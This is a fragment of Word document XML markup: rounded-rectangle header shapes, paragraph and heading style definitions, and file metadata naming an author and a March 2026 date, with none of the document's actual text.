                              </a:cubicBez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A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93" name="Shape 15493"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6172200" cy="33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0" h="330200">
                              <a:moveTo>
                                <a:pt x="50800" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6121400" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6149482" y="0"/>
                                <a:pt x="6172200" y="22718"/>
                                <a:pt x="6172200" y="50800"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="6172200" y="279400"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6172200" y="307482"/>
                                <a:pt x="6149482" y="330200"/>
                                <a:pt x="6121400" y="330200"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="50800" y="330200"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="22718" y="330200"/>
                                <a:pt x="0" y="307482"/>
                                <a:pt x="0" y="279400"/>
                              </a:cubicBez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A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491" style="width:486pt;height:26pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:63pt;mso-position-vertical-relative:page;margin-top:60pt;" coordsize="61722,3302">
              <v:shape id="Shape 15492" style="position:absolute;width:61722;height:3302;left:0;top:0;" coordsize="6172200,330200" path="m50800,0l6121400,0c6149482,0,6172200,22718,6172200,50800l6172200,279400c6172200,307482,6149482,330200,6121400,330200l50800,330200c22718,330200,0,307482,0,279400l0,50800c0,22718,22718,0,50800,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3a5c"/>
              </v:shape>
              <v:shape id="Shape 15493" style="position:absolute;width:61722;height:3302;left:0;top:0;" coordsize="6172200,330200" path="m50800,0l6121400,0c6149482,0,6172200,22718,6172200,50800l6172200,279400c6172200,307482,6149482,330200,6121400,330200l50800,330200c22718,330200,0,307482,0,279400l0,50800c0,22718,22718,0,50800,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3a5c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DE6DF" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1200" w:right="6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3A85BFD" wp14:editId="5CDDD0A6">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>800100</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>762000</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6172200" cy="330200"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="15484" name="Group 154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330200"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6172200" cy="330200"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="15485" name="Shape 15485"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6172200" cy="33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0" h="330200">
                              <a:moveTo>
                                <a:pt x="50800" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6121400" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6149482" y="0"/>
                                <a:pt x="6172200" y="22718"/>
                                <a:pt x="6172200" y="50800"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="6172200" y="279400"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6172200" y="307482"/>
                                <a:pt x="6149482" y="330200"/>
                                <a:pt x="6121400" y="330200"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="50800" y="330200"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="22718" y="330200"/>
                                <a:pt x="0" y="307482"/>
                                <a:pt x="0" y="279400"/>
                              </a:cubicBez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A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486" name="Shape 15486"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6172200" cy="33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200" h="330200">
                              <a:moveTo>
                                <a:pt x="50800" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6121400" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6149482" y="0"/>
                                <a:pt x="6172200" y="22718"/>
                                <a:pt x="6172200" y="50800"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="6172200" y="279400"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6172200" y="307482"/>
                                <a:pt x="6149482" y="330200"/>
                                <a:pt x="6121400" y="330200"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="50800" y="330200"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="22718" y="330200"/>
                                <a:pt x="0" y="307482"/>
                                <a:pt x="0" y="279400"/>
                              </a:cubicBez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A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484" style="width:486pt;height:26pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:63pt;mso-position-vertical-relative:page;margin-top:60pt;" coordsize="61722,3302">
              <v:shape id="Shape 15485" style="position:absolute;width:61722;height:3302;left:0;top:0;" coordsize="6172200,330200" path="m50800,0l6121400,0c6149482,0,6172200,22718,6172200,50800l6172200,279400c6172200,307482,6149482,330200,6121400,330200l50800,330200c22718,330200,0,307482,0,279400l0,50800c0,22718,22718,0,50800,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3a5c"/>
              </v:shape>
              <v:shape id="Shape 15486" style="position:absolute;width:61722;height:3302;left:0;top:0;" coordsize="6172200,330200" path="m50800,0l6121400,0c6149482,0,6172200,22718,6172200,50800l6172200,279400c6172200,307482,6149482,330200,6121400,330200l50800,330200c22718,330200,0,307482,0,279400l0,50800c0,22718,22718,0,50800,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3a5c"/>
              </v:shape>
              <w10:wrap type="squar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BC0"/>
    <w:rsid w:val="000E505A"/>
    <w:rsid w:val="00153449"/>
    <w:rsid w:val="003B4A86"/>
    <w:rsid w:val="003C0373"/>
    <w:rsid w:val="007F7D8E"/>
    <w:rsid w:val="00BA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5C87E"/>
  <w15:docId w15:val="{0E5FBD8F-4EAC-4770-A49C-C9089F3F5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7" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="1A1A2E"/>
      <w:sz w:val="20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180" w:line="265" w:lineRule="auto"/>
      <w:ind w:left="270" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="FFFFFF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147" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="0D1B2A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link w:val="2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="0D1B2A"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="العنوان 1 Char"/>
    <w:link w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial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6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4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1484</Words>
  <Characters>8463</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>70</Lines>
  <Paragraphs>19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Mohamed Sabry</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-21T19:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-21T19:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>